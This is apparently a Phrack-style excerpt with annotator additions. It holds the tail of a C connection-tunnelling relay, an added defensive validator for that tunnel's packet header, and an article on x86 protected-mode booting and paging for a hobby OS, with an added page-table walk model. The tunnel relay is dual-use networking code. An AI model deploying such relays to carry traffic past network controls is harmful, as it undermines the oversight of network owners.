    shutdown(tunnel_sock,2);
    close(tunnel_sock);
    tunnel_sock=-1;
    return(-1);
  }
  /* Then the payload. Note it is read from offset 0, overwriting the header,
     which is what check_tunnel_connection() and writen() expect. */
  left=tunnel_size;
  while (left!=0) {
    n=read(tunnel_sock,&tunnel_buf[got],left);
    if (n<1) { /* the original only tested n<0, so EOF mid-packet spun forever */
      fprintf(log,"Connection terminated in receive_tunnel!\n");
      shutdown(tunnel_sock,2);
      close(tunnel_sock);
      tunnel_sock=-1;
      return(-1);
    }
    got+=n;
    left-=n;
  }
  return(n);
}
void check_local_connections(fd_set *selector,fd_set *errsel,struct connection *con) {
  /*Here we check each of the local connections for incoming data*/
  char buf[MAXLEN*2];
  int i,n;
  con=connections.head;
  for (i=0; i<connections.num&&con; i++, con=con->next) {
    if (FD_ISSET(con->local_sock,errsel)) {
      fprintf(log,"Local connection terminated\n");
      fprintf(log,"Removing connection to %s %d\n",con->host,con->port);
      if (con->remote_sock) transmit_tunnel(buf,0,0,con->remote_sock);
      removeconnection(con);
      break; /* the list changed under us; the next select pass handles the rest */
    }
    if (FD_ISSET(con->local_sock,selector)&&con->remote_sock) {
      n=read(con->local_sock,&buf[4],MAXLEN);
      if (n<1) {
        fprintf(log,"Local connection terminated\n");
        fprintf(log,"Removing connection to %s %d\n",con->host,con->port);
        transmit_tunnel(buf,0,0,con->remote_sock);
        removeconnection(con);
        break;
      }
      /*forward the data to the tunnel*/
      transmit_tunnel(buf,n,con->local_sock,con->remote_sock);
    }
  }
}


void ZERO(char * buf,int size) {int i=0;while(i<size) buf[i++]=0;}


int writen(int fd, char *ptr, int nbytes)
{
  int nleft=nbytes,nwritten;
  while (nleft>0) {
    nwritten=write(fd,ptr,nleft);
    if (nwritten<=0) return(nwritten);
    nleft-=nwritten;
    ptr+=nwritten;
  }
  return(nbytes - nleft);
}


int remote_connect(char *machine,int port)
{
  int sock;
  struct sockaddr_in ser;
  ZERO((char *)&ser,sizeof(ser));
  ser.sin_family = AF_INET;
  ser.sin_addr.s_addr = inet_addr(machine);
  ser.sin_port = htons(port);
  sock=socket(AF_INET,SOCK_STREAM,0);
  if (sock==-1) {perror("Error opening socket");return(-1);}
  if (connect(sock,(struct sockaddr *)&ser,sizeof(ser))==-1) {
    fprintf(log,"Can't connect to server:%s\n",strerror(errno));
    close(sock); /* the original leaked the descriptor on a failed connect */
    return(-1);
  }
  return(sock);
}


void disconnect(struct connection *con,int sock1,int sock2) {
  fprintf(log,"Closing link to: %s %d\n",con->host,con->port);
  shutdown(sock1,2);
  shutdown(sock2,2);
  close(sock1);
  close(sock2);
  close(con->local_sock);
}


void init_descriptors() {
  int i;
  for (i=0; i<DESC_MAX; i++) {
    descriptors[i]=NULL;
  }
}


void removeconnection(struct connection *con) {
  struct connection *c2,*c=connections.head;
  if (!c) return; /* empty list; the original dereferenced c->next here */
  if (c==con) {
    connections.head=c->next;
    descriptors[c->local_sock]=NULL;
    free(c->host);
    shutdown(c->local_sock,2);
    close(c->local_sock);
    free(c);
    connections.num--;
    return;
  }
  c2=c;
  c=c->next;
  while(c) {
    if (c==con) {
      /* connections.head=c2; */
      c2->next=c->next;
      descriptors[c->local_sock]=NULL;
      free(c->host);
      shutdown(c->local_sock,2);
      close(c->local_sock);
      free(c);
      connections.num--;
      return;
    }
    c2=c;
    c=c->next;
  }
}
<-->
<++> tunnel/share.h
/**********************/
/* Structs & Defines  */
/**********************/


#define MAX_HOSTNAME_SIZE 128
#define MAXLEN 32768     /*Maximum length of our data*/
#define ALIVE_TIME 60    /*Time to wait before sending a Myping*/
#define DESC_MAX 128     /*Maximum number of descriptors used*/
#define RETRY_TIME 60    /* Time to wait before we reconnect to portal*/
#define max(a,b) ((a>b)?a:b)
#define min(a,b) ((a<b)?a:b)
#define AUTHOR "bishnu@hotmail.com"
struct connections {
  int num;
  struct connection *head;
};

struct connection {
  struct connection *next;
  int port;
  int local_sock;
  int remote_sock;
  time_t time;
  char *host;
};


char *get_ip(char *host);
void random_delay(int n);
int transmit_tunnel(char *data,int size,int source,int destination);
int receive_tunnel();
void hostname(char *name);
void ZERO(char * buf,int size);
int writen(int fd, char *ptr, int nbytes);
void ctrlC(int sig);
void sleep_usec(int n);
void nonblock(int s);
int remote_connect(char *machine,int port);
void disconnect(struct connection *con,int sock1,int sock2);
void init_descriptors();
int max_descriptor();
void removeconnection(struct connection *con);
void check_local_connections(fd_set *selector,fd_set *errsel, struct connection *con);
<--> 
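The header layout documented in share.c (a 1-byte destination, a 1-byte source, a 2-byte size, then the data) and the zero/non-zero rules both programs use to classify a packet invite a defensive reading: each side indexes descriptors[DESC_MAX] directly with the channel bytes and reads up to the stated size into tunnel_buf. What follows is an added example, not part of the author's tunnel/portal sources: a C parser for that header which validates every field against the limits in share.h before anything is looked up, plus a decoder for the new-connection payload laid out by check_connection_port() that always terminates the host name. The enum and struct names are my own, and the sample packets are constructed here rather than captured.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Limits copied from share.h on this page. */
#define MAXLEN            32768
#define DESC_MAX          128
#define MAX_HOSTNAME_SIZE 128

/* The packet classes the two programs derive from the header (names are mine). */
enum pkt_kind { PKT_PING, PKT_NEW, PKT_HANGUP, PKT_DATA, PKT_INVALID };

struct tunnel_hdr {
    unsigned dest;     /* byte 0: destination channel (a socket number) */
    unsigned source;   /* byte 1: source channel */
    unsigned size;     /* bytes 2-3: payload length, network byte order */
    enum pkt_kind kind;
};

/* Parse and validate one header. Returns 0 on success, -1 when the header
 * would drive an out-of-range descriptors[] lookup or an oversized read;
 * the original receive_tunnel() performs neither check. */
int parse_tunnel_hdr(const unsigned char *raw, size_t rawlen, struct tunnel_hdr *h)
{
    h->kind = PKT_INVALID;
    if (rawlen < 4) return -1;
    h->dest   = raw[0];                              /* unsigned: never negative */
    h->source = raw[1];
    h->size   = ((unsigned)raw[2] << 8) | raw[3];    /* ntohs, done by hand */
    if (h->dest >= DESC_MAX || h->source >= DESC_MAX) return -1;
    if (h->size > MAXLEN) return -1;                 /* the senders never exceed MAXLEN */

    if (h->dest == 0 && h->source == 0) h->kind = PKT_PING;
    else if (h->dest == 0)              h->kind = PKT_NEW;
    else if (h->source == 0)            h->kind = PKT_HANGUP;
    else                                h->kind = PKT_DATA;

    /* Shape rules visible in the original senders: pings and hangups carry no
     * payload; a new-connection packet carries a 4-byte port followed by at
     * most MAX_HOSTNAME_SIZE bytes of host name. */
    if ((h->kind == PKT_PING || h->kind == PKT_HANGUP) && h->size != 0) { h->kind = PKT_INVALID; return -1; }
    if (h->kind == PKT_NEW && (h->size < 5 || h->size > 4 + MAX_HOSTNAME_SIZE)) { h->kind = PKT_INVALID; return -1; }
    return 0;
}

/* Decode a PKT_NEW payload (layout from check_connection_port on this page):
 * big-endian 32-bit port, then the host name. The name is always terminated
 * here, which the original strncpy() into con->host does not guarantee. */
int parse_new_connection(const unsigned char *payload, size_t len,
                         unsigned *port, char *host, size_t hostsz)
{
    size_t namelen, i;
    if (len < 5 || hostsz == 0) return -1;
    *port = ((unsigned)payload[0] << 24) | ((unsigned)payload[1] << 16) |
            ((unsigned)payload[2] << 8)  |  payload[3];
    namelen = len - 4;
    if (namelen > hostsz - 1) namelen = hostsz - 1;
    for (i = 0; i < namelen && payload[4 + i] != '\0'; i++)
        host[i] = (char)payload[4 + i];
    host[i] = '\0';
    return 0;
}

/* Constructed sample traffic (not captured from a real session). */
static const unsigned char sample_ping[]   = { 0, 0, 0, 0 };
static const unsigned char sample_hangup[] = { 9, 0, 0, 0 };
static const unsigned char sample_bad_ch[] = { 200, 3, 0, 0 };      /* channel >= DESC_MAX */
static const unsigned char sample_huge[]   = { 5, 7, 0xff, 0xff };  /* 65535 > MAXLEN */
static const unsigned char sample_new[]    = { 0, 7, 0, 9,          /* header: size 9 */
                                               0, 0, 0x0b, 0xb8,    /* port 3000 */
                                               'h', 'o', 's', 't', 0 }; /* "host" + NUL */

/* Runs every sample header through the parser; returns how many were accepted. */
int count_accepted_samples(void)
{
    const unsigned char *pk[] = { sample_ping, sample_hangup, sample_bad_ch, sample_huge, sample_new };
    struct tunnel_hdr h;
    int accepted = 0;
    size_t i;
    for (i = 0; i < 5; i++)
        if (parse_tunnel_hdr(pk[i], 4, &h) == 0) accepted++;
    return accepted;   /* ping, hangup and new are accepted: 3 */
}

/* Decodes the sample new-connection packet; returns its port, or 0 on error. */
unsigned sample_new_port(char *host, size_t hostsz)
{
    struct tunnel_hdr h;
    unsigned port;
    if (parse_tunnel_hdr(sample_new, sizeof sample_new, &h) != 0 || h.kind != PKT_NEW) return 0;
    if (parse_new_connection(sample_new + 4, h.size, &port, host, hostsz) != 0) return 0;
    return port;
}

int main(void)
{
    char host[MAX_HOSTNAME_SIZE];
    printf("accepted %d of 5 sample headers\n", count_accepted_samples());
    printf("new connection: port %u host %s\n", sample_new_port(host, sizeof host), host);
    return 0;
}
```

The two rejected samples are exactly the inputs that would make the original code index past descriptors[] or read past the intended payload, so a check of this shape belongs in receive_tunnel() before tunnel_des, tunnel_src and tunnel_size are used.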


----[ EOF


---[ Protected mode programming and O/S development


----[ Mythrandir <jwthomp@cu-online.com>


----[ Forward 


About two months ago I decided to begin learning about developing an operating
system from the ground up. I have been involved in trusted operating systems
development for over two years now but have always done my work with
pre-existing operating systems. Mucking with this driver model, deciphering
that streams implementation, loving this, hating that. I decided it was time
to begin fresh and start really thinking about how to approach the design
of one, so that I would be happy with every part. At least if I wasn't, I
would only be calling myself names.


This article is the first tentative step in my development of an operating 
system. What is here is not really much of a kernel yet. The big focus of 
this article will be getting a system up and running in protected mode with a 
very minimal kernel. I stress minimal. I have been asked repeatedly what my 
design goals for this operating system are. The fact is the operating system 
itself was the goal for this part. There was simply to much that I didn’t 
know about this stage of the development to go on designing something. It 
would be like asking a kindergarten fingerpainter what her final masterpiece 
was going to look like. 


However, now that I have this phase reasonably done, it is time to begin 
thinking about such issues as: a security subsystem, a driver subsystem, as 
well as developing a real task manager and a real memory manager. Hopefully, 
by the next phrack I will be able to not only answer what I want for these 
topics but have also implemented many of them. This will leave me with a much 
more solid kernel that can be built upon. 


So, why write this article? There are several reasons. First, writing down
what you have done always helps solidify your thoughts and understanding.
Second, having to write an article imposes a deadline on me which forces me to
get the job done. Finally, and most importantly, I hope to give out enough
knowledge that others who are interested in the subject can begin to do some
work of their own.


One comment on the name. JeffOS is not going to be the final name for this OS. 
In fact several names have been suggested. However, I have no idea yet what I 
want to call it, mostly because it just isn’t solidified enough for a name. 
When its all said and done, I do hope I can come up with something better than 
JeffOS. For now, getting a real working kernel is more important than a real 
working name. 


I hope that you find the following information interesting, and worth 
investigating further. 


Cheers, 
Jeff Thompson 
AKA Mythrandir 


PS: Some words on the Cryptography article. First a thank you for all of the
letters that I received on the article. I am happy to find that many people
found the article interesting. For several people it rekindled an old interest
which is always great to hear. However, for several people I have unfortunate
news as well. The next article in the series will have to be postponed for
a few issues until I complete this operating system. As is with many people,
I have been caught by a new bug (The OS bug) and have set myself up to be
committed to the work for some time. I am of course still interested in
discussing the topic with others and look forward to more email on the subject.


The winners of the decryption contest were: 


1st message:
1st) Chaos at chaos@vector.nevtron.si
2nd) Oxygen at oxygen@james.kalifornia.com


Solution: 
The baron’s army will attack at dawn. Ready the Templar knights and strike his 
castle while we hold him. 


2nd message: 

1st) Chaos

Solution: 

MULTICAST PROTOCOLS HAVE BEEN DEVELOPED TO SUPPORT GROUP COMMUNICATIONS 


THESE PROTOCOLS USE A ONE TO MANY PARADIGM FOR TRANSMISSION TYPICALLY 
USING CLASS D INTERNET PROTOCOL ADDRESSES TO SPECIFY SPECIFIC MULTICAST GROUPS 


Also, there is one typo in my article. The book which was written without the 
letter ’e’ was not The Great Gatsby, but rather Gadsby. Thanks to Andy 
Magnusson for pointing that out. 


Great job guys! 


----[ Acknowledgements 


I owe a certain debt to two people who have been available to me during my
development work. Both have done quite a bit of work developing their own
protected mode operating systems. I would like to thank Paul Swanson of the
ACM@UIUC chapter for helping solve several bugs and for giving me general tips
on issues I encountered. I would also like to thank Brian Swetland of
Neoglyphics for giving me a glimpse of his operating system. He was also nice
enough to allow me to steal some of his source code for my use. This source
includes the console io routines which saved me a great deal of time. Also,
the i386 functions were given to me by Paul Swanson, which has made a lot of
the common protected mode instructions easily useable.


Following new releases and information on this operating systems work, I am
currently redoing my web site and will have it up by Feb 1, 1998. I will be
including this entire article on that site along with all updates to the
operating system as I work on it. One of the first things that I will be
doing is rewriting all of the kernel. A large part of what is contained
within these pages was a learning experience. Unfortunately, one consequence
of trying to get this thing done was it becoming fairly messy and hackish. I
would like to clean it up and begin to build upon it. Having a good code base
will be invaluable to this. So please watch for the next, and future releases
of this code and feel free to contact me with any feedback or questions. I
will do my best to help. I won't be able to answer every question but I will
certainly try. Also, please be patient as I have a very busy schedule outside
of this project and am often times caught up by it.


I can be reached at: 
jwthomp@cu-online.com
and my web site is at: 
http://www.cu-online.com/~jwthomp/ (Up Feb 1, 1998) 


----[ Introduction


Throughout this document I assume a certain level of knowledge on the part of
the reader. This knowledge includes C and assembly language programming, and
x86 architecture.


The development requirements for the GuildOS operating system are: 


An ELF compiler 
I used the gnu ELF compiler which comes with linux. It is possible to use 
other ELF cross compilers on other systems as well. 


a386 assembler 
This can be obtained from: 


Eric Isaacson 

416 E. University Ave. 
Bloomington IN 47401-4739 
71333.3154@compuserve.com 


or call 1-812-335-1611 
A86+D86+A386+D386 is $80 
Printed manual $10 


This is a really nice assembler. Buy a copy. I did. 


It is also possible to convert the boot loader assembly code to another 
assembler. 


A 486+ machine 
You must have a machine to test the OS on. 


Great books to read to gain an understanding of the various topics presented 
in the following pages are: 


Protected Mode Software Architecture by Tom Shanley from MindShare, Inc. 
ISBN 0-201-55447-X $29.95 US 


This book covers the protected mode architecture of the x86. It also explains 
the differences between real mode and protected mode programming. This book 
contains much of the information which is in the Intel Operating Systems 
Developers guide, but also explains things much more in depth. 


Developing Your Own 32-Bit Operating System by Richard A. Burgess from SAMS 
Publishing. ISBN 0-672-30655-7 


This book covers the development of a complete 32-bit OS. The author also
creates his own 32-bit assembler and compiler. Considerable portions of the
code are written in asm, but there is still quite a bit in C.


The entire Intel architecture series and their OS developers guides which are
available from their web site for free.


----[ Chapter 1 - Booting into protected mode


The first step in setting up an operating system on the x86 architecture is to 
switch the machine into protected mode. Protected mode allows you to use 
hardware protection schemes to provide operating system level security. 

The first component which I began working on was the first stage boot loader
which is located in "JeffOS/loader/first/".

The first stage boot loader is placed on the first sector of the floppy. Each
sector is 512 bytes. This is not a lot of room to write all of the code
required to boot into protected mode the way I would like to, so I had to break
the boot loader into two parts: thus the first and second stage floppy loader.
After the Power On Self-Test (POST) this first sector is loaded up into
memory location 0000:7C00. I designed the first stage of the floppy boot
loader to load up all of the files into memory to be executed. The first
instruction in the boot loader jumps to the boot code. However, between the
jump and the boot code are some data structures.


The first section is the disk parameters. I’m not currently using any of this 
information but will in future versions. The next set of structures contain 
information on the other data files on the floppy disk. Each structure looks 
like this in assembly: 


APCX  DW 0000h  ; Specifies CX value for INT 13h BIOS routine
APDX  DW 0000h  ; DX
APES  DW 0000h  ; ES
APBX  DW 0000h  ; BX
APSZ  DB 0h     ; Specifies number of sectors to read in
APSZ2 DB 0h     ; Unused

There are four copies of this structure (APxx, BPxx, CPxx, DPxx). 


The INT 13h BIOS call has the following arguments:


ch: Cylinder number to start reading from.
cl: Sector number to start at.
dh: Head number of drive to read from (00h or 01h for 1.44M floppy disk drives)
dl: Drive number (00h for Disk A)
es: Segment to store the read in sectors at.
bx: Offset into the segment to read the sectors into.
ah: Number of sectors to read in.
al: Function number for INT 13h. (02h is to read in from the disk)


I use the APxx to load the second stage boot loader. BPxx is being used 
to load the first stage kernel loader. CPxx is used to load a simple user 
program. Finally, DPxx is used to load the kernel in. 


Following the loader structures are two unused bytes which are used to store
temporary data. SIZE is used but SIZE2 is not currently used.


The boot code follows these structures. This boot code relocates itself into 
another section of memory (9000:0000 or 90000h linear). Once relocated, it 
loads all of the files into memory and then jumps into the beginning of the 
second stage boot loader. 


The first part of the second stage boot loader contains a macro which is used 
to easily define a Global Descriptor Table (GDT) entry. In protected mode the 
GDT is used to store information on selectors. A selector in protected mode 
is referred to by a number stored in any of the segment registers. A selector 
has the following format: 


Bits      Use 
15 - 3    Descriptor Table Index 
2         Table Indicator 
1 - 0     The Requestor Privilege Level 


The Descriptor Table Index (DT) is an index into the GDT. The first entry 
in the GDT is 00h, the second is 08h, then 10h, etc. The reason that the 
entries progress in this manner is that the 3 least significant bits are 
used for other information. So to find the index into the GDT you do a 
selector & 0xfff8 (DT = Selector & 0xfff8). 


The Table Indicator selects whether you are using a GDT or a Local Descriptor 
Table (LDT). I have not yet had a reason to use LDT’s so I will leave this 
information to your own research for now. 


Finally, the Requestor Privilege Level is used to tell the processor what 
level of access you would like to have to the selector. 
0 = OS 
1 = OS (but less privileged than 0) 
2 = OS (but less privileged than 1) 
3 = User level 


Typically levels 0 and 3 are the only ones used in modern operating systems. 


The GDT entries which describe various types of segments have the following 
form: 


63 - 56   Upper Byte of Base Address 
55        Granularity Bit 
54        Default Bit 
53        0 
52        Available for Use (free bit) 
51 - 48   Upper Digit of Limit 
47        Segment Present Bit 
46 - 45   Descriptor Privilege Level 
44        System Bit 
43        Data/Code Bit 
42        Conforming Bit 
41        Readable bit 
40        Accessed bit 
39 - 32   Third Byte of Base Address 
31 - 24   Second Byte of Base Address 
23 - 16   First Byte of Base Address 
15 - 8    Second Byte of Limit 
7 - 0     First Byte of Limit 


The base address is the starting location of the segment described by the 
descriptor (for code or data segments). The limit is the number of bytes or 
4k pages. Whether it is bytes or 4k pages depends on the setting of the 
granularity bit. If the granularity bit is set to 0 then the limit specifies 
the length in bytes. If it is set to 1 then the limit specifies the length of 
the segment in 4k pages. 


The default bit specifies whether the code segment is 32bit or 16bit. If it is 
set to 0 then it is 16bit. If it is set to 1 then it is 32bit. 

The present bit is set to one if the segment is currently in memory. This is 
used for virtual paging. 


The descriptor privilege level is similar to the RPL. The DPL simply states at 
what protection level the segment exists. The values are the same as for 
the RPL. 


The system bit is used to specify whether the segment contains a system 
segment. It is set to 0 if it is a system (OS) segment. 


The data/code bit is used to specify whether the segment is to be used as a 
code segment or as a data segment. A code segment is used to execute code 
from and is not writable. A data segment is used for stacks and program 
data. Its format is slightly different from the code segment depicted above. 


The readable bit is used to specify whether information can be read from the 
segment or whether it is execute only. 


The next part of the second stage floppy boot loader contains the code which 
is used to enable the A20 address line. This address line allows you to 
access beyond the 1MB limit that was imposed on normal DOS real mode 
operation. For a discussion of this address line I recommend looking at the 
Intel architecture books. 


Once enabled, the GDT that exists as data at the end of the assembly file is 
loaded into the GDT register. This must be done before the switch into 
protected mode. Otherwise any memory accesses will not have a valid selector 
described for them and will cause a fault (I learned this from experience). 


Once this is completed the move is made to protected mode by setting the 
protected mode bit in the CR0 register to 1. Following the code which enables 
protected mode, there is data which represents a far call into the next 
portion of the second stage boot loader. This causes a new selector to be 
used for CS as opposed to an undefined one. 


The code that is jumped into simply sets up the various selectors for the data 
segments. 


There is then some simple debugging code which prints to the screen. This was 
used for myself and can be removed. 


The stack segment is then set up along with the stack pointer. I placed the 
stack at 90000h. 


Finally I push the value for the stack onto the stack (to be retrieved by the 
kernel) and then call linear address 100080h which contains the first stage 
loader for the kernel. 


----[ Chapter 2 - The first stage kernel boot loader 


The first stage kernel boot loader is located in \boot. 


First some notes on what is happening with the first stage boot loader. The 
boot loader is compiled to ELF at a set TEXT address so that I can jump into 
the code and have it execute for me. In the makefile I specify the text 
address to be 10080. The first 80h bytes are used as the ELF header. I 
completely ignore this information and jump directly into linear memory 
address 10080h. It is my understanding that newer versions of the ELF compiler 
have a slightly different header length and may cause this number to need to be 
modified. This can be determined by using a disassembler (i.e. DEBUG in DOS) 
to determine where the text segment is beginning. 


The two files of importance to the boot loader are main.c and mem.c. 


main.c contains the function 'void _start(unsigned long blh);'. This function 
must be the first function linked in. So main.c must be the first file which 
is linked and _start() must be the first function in it. This guarantees that 
_start will be at 10080h. The parameter blh is the value which was pushed in 
by the second stage boot loader. This originally had meaning, but no longer 
does. 


The first thing that _start does is to call kinit_MemMgmt which is the 
initialization routine for memory. 


The first thing that kinit_MemMgmt does is set nMemMax to 0xfffff. This is 
the maximum number of bytes on the system. This value is 1MB. kinit_MemMgmt 
then calls kmemcount which attempts to calculate the amount of free memory on 
the system. Currently this routine does not work properly and assumes that 
there is 2MB of free memory on the system. This is sufficient for now but 
needs to be fixed in the future. 


kinit_MemMgmt then calls kinit_page which sets up the page tables for the 
kernel. 


Paging is the mechanism used to define what memory a task is able to access. 
This is done by creating a "virtual" memory space which the task accesses. 
Whenever an access to memory occurs the processor looks into the page tables 
to determine what "real" physical memory is pointed to by this memory location. 
For example, the kernel could designate that each task will get 32k (8 pages) 
of memory to use for the stack. Without using paged memory each of these 
memory locations would occur at a different address. However, by using paging 
you can map each of these physical memory allocations to a paged address 
which allows each of these allocations to appear to occur at the same location. 


The page tables are broken up in the following manner. First is the page 
directory. It is composed of 1024 entries which have the following properties: 

31 - 12   Page Table Base Address 
11 - 9    Unused (Free bits) 
8         0 
7         Page Size Bit 
6         0 
5         Accessed Bit 
4         Page Cache Disable Bit 
3         Page Write Through Bit 
2         User/Supervisor Bit 
1         Read/Write Bit 
0         Page Present Bit 


The Page Table Base address is an index to the page table which contains 
information about this memory location. When a memory location is accessed 
the most significant 10 bits are used to reference one of the 1024 entries in 
the page directory. This entry will point to a page table which has a physical 
memory address equal to the Page Table Base Address. This table is then 
referenced to one of its 1024 entries by the 21 - 12 bits of the memory 
address. 


The Page Size Bit tells whether each page is equal to 4kb (Bit = 0) or 
4MB (Bit = 1). 

The accessed bit is used to show whether the page has ever been accessed. Once 
set to 1, the OS must reset it to 0. This is used for virtual paging. 


The Page Cache Disable Bit and Page Write Through Bit are not currently used 
by me, so I will leave their definitions as an exercise to the reader (enjoy). 


The User/Supervisor Bit specifies whether access to the page table is 
restricted to access by tasks with privilege level 0, 1, 2 or 3. If the bit is 
set to 0 then only tasks with level 0, 1, or 2 can access this page table. If 
the bit is set to 1, then tasks with level 0, 1, 2, or 3 can access this page 
table. 


The Read/Write bit is used to specify whether a user level task can write to 
this page table. If it is set to 0 then it is read only to "User" tasks. If 
it is set to 1 then it is read/writable by all tasks. 


Finally, the Present Bit is used to specify whether the page table is present 
in memory. If this is set to 1 then it is. 


Once the page directory is referenced, the offset into the page table is 
selected using the next 10 bits of the memory reference. Each page table 
has 1024 entries with each entry having the following structure: 

31 - 12   Page Base Address 
11 - 9    Unused (Free bits) 
8 - 7     0 
6         Dirty Bit 
5         Accessed Bit 
4         Page Cache Disable Bit 
3         Page Write Through Bit 
2         User/Supervisor Bit 
1         Read/Write Bit 
0         Page Present Bit 


The Page Base Address holds the upper 20 bits of the physical memory address 
that the memory access points to. The lower 12 bits are taken from the original 
linear memory access. 


The Dirty, Accessed, Page Cache, and Page Write Through Bits are all used for 
virtual memory and other areas with which I have not yet been concerned. So 
they are relegated to the reader (for now). 


The remaining three bits behave just as in the page directory except that 
they apply to the physical memory page as opposed to a page table. All 
kernel pages are set to have Supervisor, Read/Write, and Page Present bits 
set. User pages do not have the supervisor bits set. 


The code in kinit_page creates the page directory in the first of the three 
physical pages that it set aside. The next page is used to create a low (user) 
memory area of 4MB (One page table of 1024 entries points to 1024 4kb pages, 
thus 4MB). The third page is used to point to high (OS) memory. 


The kinit_page function sets all of the low page memory equal to physical 
memory. This means that there is a one to one correlation for the first 4MB 
of memory to paged memory. kinit_page then maps in ten pages starting at 
70000h linear into 0x80000000. Entry number 0 of the page directory is then 
set to point to the low page table. Entry number 512 is set to point to the 
high page table. 


Finally the kinit_page function places the address of the page directory 
into the cr3 register. This tells the processor where to look for the page 
tables. Then cr0 has its paging bit turned on, which informs the processor 
that memory accesses should go through the page tables rather than just being 
direct physical memory accesses. 


After this the _start function is returned into and k_start() has been set to 
0x80000080 which points to the _start() function in the main kernel. 
_start in the boot code calls this function which starts the real kernel off. 
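As an added example (not JeffOS code), here is the two-level page table walk described in this chapter done in software, with the same PDE/PTE bits and the same mapping kinit_page sets up: directory entry 0 identity-maps the low 4MB and entry 512 maps ten pages starting at 70000h to 0x80000000. The physical placement of the three tables and the choice to make the low table user-accessible are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Bits of a page directory / page table entry, as given in the text. */
#define PG_PRESENT   0x001u        /* bit 0: Page Present */
#define PG_RW        0x002u        /* bit 1: Read/Write */
#define PG_USER      0x004u        /* bit 2: User/Supervisor (1 = level 3 may access) */
#define PG_BASE_MASK 0xFFFFF000u   /* bits 31-12: table or page base address */

enum walk_status {
    WALK_OK,
    WALK_PDE_NOT_PRESENT,   /* page directory entry has P = 0 */
    WALK_PTE_NOT_PRESENT,   /* page table entry has P = 0 */
    WALK_PROTECTION         /* user access to a supervisor or read-only page */
};

/* The three physical pages kinit_page sets aside: page directory, low (user)
 * page table and high (OS) page table.  Their physical addresses are
 * constructed for this model; the real kernel picks its own. */
#define PD_PHYS      0x1000u
#define LOW_PT_PHYS  0x2000u
#define HIGH_PT_PHYS 0x3000u

static uint32_t page_dir[1024];
static uint32_t low_pt[1024];
static uint32_t high_pt[1024];

/* Stand-in for physical memory: map a table's physical address to its array. */
static uint32_t *table_at(uint32_t phys)
{
    if (phys == PD_PHYS)      return page_dir;
    if (phys == LOW_PT_PHYS)  return low_pt;
    if (phys == HIGH_PT_PHYS) return high_pt;
    return NULL;
}

/* Build the layout the text describes: identity-map the first 4MB through
 * directory entry 0, and map ten pages starting at physical 70000h at linear
 * 0x80000000 through directory entry 512 (0x80000000 >> 22 == 512).
 * Returns the number of page table entries marked present. */
int kinit_page_model(void)
{
    int present = 0;
    for (int i = 0; i < 1024; i++) { page_dir[i] = 0; low_pt[i] = 0; high_pt[i] = 0; }
    for (uint32_t i = 0; i < 1024; i++, present++)
        low_pt[i] = (i << 12) | PG_PRESENT | PG_RW | PG_USER;     /* user pages (assumed) */
    for (uint32_t i = 0; i < 10; i++, present++)
        high_pt[i] = (0x70000u + (i << 12)) | PG_PRESENT | PG_RW; /* kernel: U/S clear */
    page_dir[0]   = LOW_PT_PHYS  | PG_PRESENT | PG_RW | PG_USER;
    page_dir[512] = HIGH_PT_PHYS | PG_PRESENT | PG_RW;
    return present;
}

/* Walk the tables the way the processor does for one linear address:
 * bits 31-22 select the directory entry, bits 21-12 the table entry and the
 * low 12 bits are carried over unchanged.  user != 0 models a level 3 task. */
enum walk_status translate(uint32_t cr3, uint32_t linear, int user, int write,
                           uint32_t *phys)
{
    uint32_t *pd = table_at(cr3 & PG_BASE_MASK);
    if (pd == NULL) return WALK_PDE_NOT_PRESENT;
    uint32_t pde = pd[linear >> 22];
    if (!(pde & PG_PRESENT)) return WALK_PDE_NOT_PRESENT;
    uint32_t *pt = table_at(pde & PG_BASE_MASK);
    if (pt == NULL) return WALK_PTE_NOT_PRESENT;
    uint32_t pte = pt[(linear >> 12) & 0x3FFu];
    if (!(pte & PG_PRESENT)) return WALK_PTE_NOT_PRESENT;
    /* A user task needs U/S set at both levels, and R/W at both levels to write. */
    if (user) {
        if (!(pde & PG_USER) || !(pte & PG_USER)) return WALK_PROTECTION;
        if (write && (!(pde & PG_RW) || !(pte & PG_RW))) return WALK_PROTECTION;
    }
    *phys = (pte & PG_BASE_MASK) | (linear & 0xFFFu);
    return WALK_OK;
}

/* Convenience wrappers that use the model's page directory as cr3. */
enum walk_status status_of(uint32_t linear, int user, int write)
{
    uint32_t phys;
    return translate(PD_PHYS, linear, user, write, &phys);
}

/* Physical address of a linear address, or 0xFFFFFFFF when the walk faults. */
uint32_t phys_of(uint32_t linear, int user, int write)
{
    uint32_t phys = 0xFFFFFFFFu;
    if (translate(PD_PHYS, linear, user, write, &phys) != WALK_OK) return 0xFFFFFFFFu;
    return phys;
}

int main(void)
{
    kinit_page_model();
    /* the kernel entry point 0x80000080 lands at physical 70080h */
    printf("0x80000080 -> 0x%05x\n", phys_of(0x80000080u, 0, 0));
    /* a user task cannot touch the high mapping */
    printf("user read of 0x80000080: status %d\n", status_of(0x80000080u, 1, 0));
    return 0;
}
```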


----[ Chapter 3 The Kernel 


The kernel is where all of the fun begins. Unfortunately, this is the place 
that needs the most work. However, there is enough here to demonstrate the 
beginnings of what needs to be done to build a viable kernel for your own work. 


The kernel boot loader created the kernel page table and then jumped into the 
kernel at _start(). _start() then sets up the console, clears it, and displays 
the message "Main kernel loaded.". Once this is done it runs the memory 
manager initialization routine 'kinit_page()'. 


The memory manager initialization routine begins by initializing a structure 
called the PMAT. The PMAT is a giant bit field (2048 bytes), where each bit 
represents one page of physical memory. If a bit is set to 1, the 
corresponding page of memory is considered allocated. If the bit is set to 0 
then it is considered unallocated. Once this array is initialized the memory 
management code sets aside the chunks of physical memory which are already in 
use. This includes the system BUS memory areas, as well as the location of the 
kernel itself in physical memory. Once this is completed the memory manager 
returns to the _start() function so that it can proceed with kernel 
initialization. 


The _start() function then calls a temporary function which I am using now to 
allocate memory which is used by the user program loaded in by the first 
stage floppy loader. This will go away after I add the loading of processes 
off of disk during run time. This function sets aside the physical memory 
which is located at 20000h linear. 


Now that the basic memory system is set up the _start() function calls the 
kinit_task() function. kinit_task() sets up the kernel task so that it can 
run as a task rather than as the only process on the system. 


kinit_task() is really a shell function which calls two other functions: 
kinit_gdt() and kinit_ktask(); kinit_gdt() initializes a new kernel GDT which 
is to be used by the kernel rather than the previous temporary one which was 
set up by the second stage floppy boot loader. Once the new location for the 
gdt is mapped into memory several selectors are added to it. Kernel Code and 
Data selectors are added. Also, User Code and Data selectors are added. Once 
these selectors are put into place, the new gdt is placed in the gdt register 
